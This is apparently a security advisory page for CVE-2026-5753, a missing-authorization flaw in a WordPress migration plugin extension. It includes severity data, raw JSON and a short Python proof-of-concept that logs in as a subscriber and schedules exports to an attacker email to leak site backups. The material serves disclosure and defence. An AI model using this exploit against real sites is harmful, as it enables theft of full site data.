Security Vulnerability Report
中文
CVE-2026-5753 CVSS 6.5 MEDIUM

CVE-2026-5753

Published: 2026-05-06 04:16:09
Last Modified: 2026-05-06 13:06:42
Source: [email protected]

Description

The All-in-One WP Migration Unlimited Extension plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.83. This is due to the 'Ai1wmve_Schedules_Controller::save' handler for 'admin_post_ai1wm_schedule_event_save' not verifying user capabilities before saving schedule data. This makes it possible for authenticated attackers, with subscriber-level access and above, to create scheduled export jobs and send backup notifications to attacker-controlled email addresses. Because such notifications include the random backup filename, full site backups can subsequently be downloaded from the target site, resulting in sensitive information exposure.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

All-in-One WP Migration Unlimited Extension <= 2.83

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "https://example.com/wp-admin/admin-post.php" username = "subscriber" password = "password" attacker_email = "[email protected]" # 1. Login to get authenticated cookies login_url = "https://example.com/wp-login.php" session = requests.Session() payload = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url } session.post(login_url, data=payload) # 2. Exploit: Create scheduled export to leak filename exploit_payload = { "action": "ai1wm_schedule_event_save", "ai1wm_schedule_email": attacker_email, # Add other required schedule parameters if necessary } response = session.post(target_url, data=exploit_payload) if response.status_code == 200: print("[+] Exploit sent successfully. Check attacker email for backup filename.") else: print("[-] Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5753", "sourceIdentifier": "[email protected]", "published": "2026-05-06T04:16:09.097", "lastModified": "2026-05-06T13:06:42.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The All-in-One WP Migration Unlimited Extension plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.83. This is due to the 'Ai1wmve_Schedules_Controller::save' handler for 'admin_post_ai1wm_schedule_event_save' not verifying user capabilities before saving schedule data. This makes it possible for authenticated attackers, with subscriber-level access and above, to create scheduled export jobs and send backup notifications to attacker-controlled email addresses. Because such notifications include the random backup filename, full site backups can subsequently be downloaded from the target site, resulting in sensitive information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://help.servmask.com/knowledgebase/unlimited-extension-changelog/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8a31080-c124-49be-b9d1-7bc5abe7cbda?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.